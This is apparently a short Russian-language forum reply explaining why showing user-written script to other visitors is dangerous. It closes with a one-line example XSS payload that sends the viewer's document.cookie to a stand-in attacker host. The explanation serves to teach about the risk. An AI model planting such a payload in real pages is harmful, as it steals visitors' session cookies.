Вам же сказали - если человек может воспользоваться этим только для себя - всё нормально.
Но если он может показать написанное другим, то нет.
Сам себе человек и так может что угодно запустить на вашей странице.
Если же он может дать другим посмотреть написанное, то нет ничег проще чем написать например:
document.write('<img src="http://l33thaxor.net/?'+encodeURIComponent(document.cookie)+'">')